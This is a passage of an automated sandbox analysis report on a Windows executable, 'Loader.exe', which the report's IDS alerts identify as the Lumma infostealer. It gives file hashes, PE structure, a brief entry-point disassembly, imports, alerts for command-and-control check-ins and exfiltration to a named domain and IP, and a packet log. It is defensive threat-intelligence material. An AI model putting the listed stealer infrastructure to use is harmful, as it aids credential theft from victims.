                                                                                                              2RxMkSAgZ8.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.157.249
                                                                                                              Dl6wuWiQdg.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                              • 172.67.157.249
                                                                                                              No context
                                                                                                              No created / dropped files found
                                                                                                              File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):7.820129189224153
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:Loader.exe
                                                                                                              File size:816'640 bytes
                                                                                                              MD5:287009edb0ce8e161d3a6328864fcf30
                                                                                                              SHA1:888dffb2851bae70ceeaf18d0ab2abd6361d3976
                                                                                                              SHA256:7c13fd5a81f9aeca85799bc1cff61329599d032569287d8b2db7b43d3a51df30
                                                                                                              SHA512:d56db6586ccf6baa98e5d012f24c904067bf20b5c3e27d3fd48507b5a7ef638b3cce3f08c7777b9438089966d9391499061a7a49d77e60aca2bcee9e29f197a6
                                                                                                              SSDEEP:24576:BK1PSMZcebOLk5iXTQs7HebOLk5iXTQs7m:E1PS498mMQc+8mMQcm
                                                                                                              TLSH:DD050191B980C0B2D857157744FADBB6053EB9700F426ACF93D81F3A8F642D1AB31B5A
                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....sg.................H........................@.......................................@.....................................(..
                                                                                                              Icon Hash:90cececece8e8eb0
                                                                                                              Entrypoint:0x40a2e0
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows cui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x6773E4A4 [Tue Dec 31 12:33:40 2024 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:6
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:6
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:6
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:019ac8c6e24f80fb88de699b6749f599
                                                                                                              Instruction
                                                                                                              call 00007F8244CA1AAAh
                                                                                                              jmp 00007F8244CA190Dh
                                                                                                              mov ecx, dword ptr [004307C0h]
                                                                                                              push esi
                                                                                                              push edi
                                                                                                              mov edi, BB40E64Eh
                                                                                                              mov esi, FFFF0000h
                                                                                                              cmp ecx, edi
                                                                                                              je 00007F8244CA1AA6h
                                                                                                              test esi, ecx
                                                                                                              jne 00007F8244CA1AC8h
                                                                                                              call 00007F8244CA1AD1h
                                                                                                              mov ecx, eax
                                                                                                              cmp ecx, edi
                                                                                                              jne 00007F8244CA1AA9h
                                                                                                              mov ecx, BB40E64Fh
                                                                                                              jmp 00007F8244CA1AB0h
                                                                                                              test esi, ecx
                                                                                                              jne 00007F8244CA1AACh
                                                                                                              or eax, 00004711h
                                                                                                              shl eax, 10h
                                                                                                              or ecx, eax
                                                                                                              mov dword ptr [004307C0h], ecx
                                                                                                              not ecx
                                                                                                              pop edi
                                                                                                              mov dword ptr [00430800h], ecx
                                                                                                              pop esi
                                                                                                              ret
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              sub esp, 14h
                                                                                                              lea eax, dword ptr [ebp-0Ch]
                                                                                                              xorps xmm0, xmm0
                                                                                                              push eax
                                                                                                              movlpd qword ptr [ebp-0Ch], xmm0
                                                                                                              call dword ptr [0042E8D8h]
                                                                                                              mov eax, dword ptr [ebp-08h]
                                                                                                              xor eax, dword ptr [ebp-0Ch]
                                                                                                              mov dword ptr [ebp-04h], eax
                                                                                                              call dword ptr [0042E894h]
                                                                                                              xor dword ptr [ebp-04h], eax
                                                                                                              call dword ptr [0042E890h]
                                                                                                              xor dword ptr [ebp-04h], eax
                                                                                                              lea eax, dword ptr [ebp-14h]
                                                                                                              push eax
                                                                                                              call dword ptr [0042E920h]
                                                                                                              mov eax, dword ptr [ebp-10h]
                                                                                                              lea ecx, dword ptr [ebp-04h]
                                                                                                              xor eax, dword ptr [ebp-14h]
                                                                                                              xor eax, dword ptr [ebp-04h]
                                                                                                              xor eax, ecx
                                                                                                              leave
                                                                                                              ret
                                                                                                              mov eax, 00004000h
                                                                                                              ret
                                                                                                              push 00431AB8h
                                                                                                              call dword ptr [0042E8F8h]
                                                                                                              ret
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              mov al, 01h
                                                                                                              ret
                                                                                                              push 00030000h
                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x2e6c40x28.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000xe8.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x350000x1b90.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x2a9a80x18.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x26e400xc0.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x2e8340x148.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x10000x247da0x24800ba0610d1e4ecb6f5f64959d9eb5b455aFalse0.5549951840753424data6.559506263512015IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              .rdata0x260000x9eb40xa00053eba87ddc7d2455b0ac2836680b1660False0.428271484375DOS executable (COM)4.9181666163124085IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .data0x300000x22800x1600112d0c9e43893ae5b7f96d23807996acFalse0.39506392045454547data4.581141173428789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .tls0x330000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .rsrc0x340000xe80x20003d6bf5d1e31277fc8fb90374111d794False0.306640625data2.344915704357875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0x350000x1b900x1c003080b38ba0e27b64b3ab5ca0f93c1c7cFalse0.7785993303571429data6.532705218372571IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                              .BSS0x370000x4a8000x4a800a8cd144a48a8381dc0aa0b30bed69672False1.000330982592282data7.999411018694849IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .BSS0x820000x4a8000x4a800a8cd144a48a8381dc0aa0b30bed69672False1.000330982592282data7.999411018694849IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_MANIFEST0x340600x87XML 1.0 document, ASCII textEnglishUnited States0.8222222222222222
                                                                                                              DLLImport
                                                                                                              KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                              EnglishUnited States
                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2024-12-31T17:42:27.392052+01002058626ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stingyerasjhru .click)1192.168.11.20524641.1.1.153UDP
                                                                                                              2024-12-31T17:42:27.808066+01002058627ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI)1192.168.11.2049755172.67.157.249443TCP
                                                                                                              2024-12-31T17:42:27.808066+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049755172.67.157.249443TCP
                                                                                                              2024-12-31T17:42:28.480934+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.11.2049755172.67.157.249443TCP
                                                                                                              2024-12-31T17:42:28.480934+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.11.2049755172.67.157.249443TCP
                                                                                                              2024-12-31T17:42:28.757362+01002058627ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI)1192.168.11.2049756172.67.157.249443TCP
                                                                                                              2024-12-31T17:42:28.757362+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049756172.67.157.249443TCP
                                                                                                              2024-12-31T17:42:29.480257+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.11.2049756172.67.157.249443TCP
                                                                                                              2024-12-31T17:42:29.480257+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.11.2049756172.67.157.249443TCP
                                                                                                              2024-12-31T17:42:30.125095+01002058627ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI)1192.168.11.2049757172.67.157.249443TCP
                                                                                                              2024-12-31T17:42:30.125095+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049757172.67.157.249443TCP
                                                                                                              2024-12-31T17:42:31.498061+01002058627ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI)1192.168.11.2049758172.67.157.249443TCP
                                                                                                              2024-12-31T17:42:31.498061+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049758172.67.157.249443TCP
                                                                                                              2024-12-31T17:42:32.356036+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.11.2049758172.67.157.249443TCP
                                                                                                              2024-12-31T17:42:32.922949+01002058627ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI)1192.168.11.2049759172.67.157.249443TCP
                                                                                                              2024-12-31T17:42:32.922949+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049759172.67.157.249443TCP
                                                                                                              2024-12-31T17:42:34.575563+01002058627ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI)1192.168.11.2049760172.67.157.249443TCP
                                                                                                              2024-12-31T17:42:34.575563+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049760172.67.157.249443TCP
                                                                                                              2024-12-31T17:42:36.328647+01002058627ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI)1192.168.11.2049761172.67.157.249443TCP
                                                                                                              2024-12-31T17:42:36.328647+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049761172.67.157.249443TCP
                                                                                                              2024-12-31T17:42:40.735775+01002058627ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI)1192.168.11.2049762172.67.157.249443TCP
                                                                                                              2024-12-31T17:42:40.735775+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049762172.67.157.249443TCP
                                                                                                              2024-12-31T17:42:41.414171+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.11.2049762172.67.157.249443TCP
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 31, 2024 17:42:27.533720970 CET49755443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:27.533759117 CET44349755172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:27.534007072 CET49755443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:27.536238909 CET49755443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:27.536257029 CET44349755172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:27.807748079 CET44349755172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:27.808065891 CET49755443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:27.815330029 CET49755443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:27.815340996 CET44349755172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:27.815583944 CET44349755172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:27.858383894 CET49755443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:27.861517906 CET49755443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:27.861517906 CET49755443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:27.861594915 CET44349755172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:28.480927944 CET44349755172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:28.480988026 CET44349755172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:28.481157064 CET49755443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:28.482935905 CET49755443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:28.482935905 CET49755443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:28.482948065 CET44349755172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:28.482952118 CET44349755172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:28.488955021 CET49756443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:28.488976002 CET44349756172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:28.489154100 CET49756443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:28.489298105 CET49756443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:28.489306927 CET44349756172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:28.757148027 CET44349756172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:28.757361889 CET49756443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:28.758467913 CET49756443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:28.758479118 CET44349756172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:28.758723021 CET44349756172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:28.759959936 CET49756443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:28.759959936 CET49756443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:28.760037899 CET44349756172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:29.480218887 CET44349756172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:29.480334997 CET44349756172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:29.480422974 CET44349756172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:29.480499983 CET44349756172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:29.480555058 CET49756443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:29.480613947 CET44349756172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:29.480716944 CET44349756172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:29.480773926 CET49756443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:29.480813026 CET44349756172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:29.480901957 CET49756443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:29.480917931 CET44349756172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:29.481095076 CET49756443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:29.481210947 CET44349756172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:29.481604099 CET44349756172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:29.481719017 CET44349756172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:29.481810093 CET49756443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:29.481833935 CET44349756172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:29.481851101 CET44349756172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:29.481969118 CET49756443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:29.481995106 CET44349756172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:29.482144117 CET44349756172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:29.482161045 CET49756443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:29.482197046 CET44349756172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:29.482244968 CET44349756172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:29.482434034 CET49756443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:29.482498884 CET49756443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:29.482498884 CET49756443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:29.482547045 CET44349756172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:29.482563019 CET44349756172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:29.858356953 CET49757443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:29.858377934 CET44349757172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:29.858525991 CET49757443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:29.858762980 CET49757443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:29.858769894 CET44349757172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:30.124845982 CET44349757172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:30.125094891 CET49757443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:30.126122952 CET49757443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:30.126133919 CET44349757172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:30.126377106 CET44349757172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:30.127736092 CET49757443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:30.127850056 CET49757443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:30.127902985 CET44349757172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:30.127918005 CET49757443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:30.127931118 CET49757443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:30.127991915 CET44349757172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:30.128150940 CET49757443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:30.128196955 CET44349757172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:31.039855003 CET44349757172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:31.040004969 CET44349757172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:31.040137053 CET49757443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:31.040230036 CET49757443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:31.040251017 CET44349757172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:31.228535891 CET49758443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:31.228560925 CET44349758172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:31.228756905 CET49758443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:31.229012966 CET49758443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:31.229024887 CET44349758172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:31.497827053 CET44349758172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:31.498060942 CET49758443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:31.499088049 CET49758443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:31.499110937 CET44349758172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:31.499629974 CET44349758172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:31.500669003 CET49758443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:31.500782967 CET49758443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:31.500828981 CET44349758172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:31.500832081 CET49758443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:31.500853062 CET44349758172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:32.356039047 CET44349758172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:32.356276989 CET44349758172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:32.356436968 CET49758443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:32.356523037 CET49758443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:32.356555939 CET44349758172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:32.656225920 CET49759443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:32.656276941 CET44349759172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:32.656513929 CET49759443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:32.656750917 CET49759443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:32.656785011 CET44349759172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:32.922565937 CET44349759172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:32.922949076 CET49759443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:32.923926115 CET49759443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:32.923938990 CET44349759172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:32.924174070 CET44349759172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:32.925245047 CET49759443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:32.925270081 CET49759443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:32.925308943 CET44349759172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:32.925321102 CET49759443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:32.925338984 CET44349759172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:32.925411940 CET49759443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:32.925422907 CET44349759172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:32.925563097 CET49759443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:32.925615072 CET44349759172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:33.661077023 CET44349759172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:33.661187887 CET44349759172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:33.661366940 CET49759443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:33.661560059 CET49759443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:33.661581039 CET44349759172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:34.305808067 CET49760443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:34.305845022 CET44349760172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:34.306034088 CET49760443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:34.306274891 CET49760443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:34.306293964 CET44349760172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:34.575256109 CET44349760172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:34.575562954 CET49760443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:34.576514006 CET49760443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:34.576530933 CET44349760172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:34.576864004 CET44349760172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:34.577945948 CET49760443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:34.578058958 CET49760443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:34.578078985 CET44349760172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:35.280762911 CET44349760172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:35.280883074 CET44349760172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:35.281111002 CET49760443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:35.281187057 CET49760443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:35.281202078 CET44349760172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.061783075 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.061809063 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.062067986 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.062304974 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.062314034 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.328341007 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.328646898 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.329427004 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.329435110 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.329662085 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.330682039 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.331887960 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.331912994 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.331938982 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.331963062 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.331970930 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.332154989 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.332212925 CET44349761172.67.157.249192.168.11.20
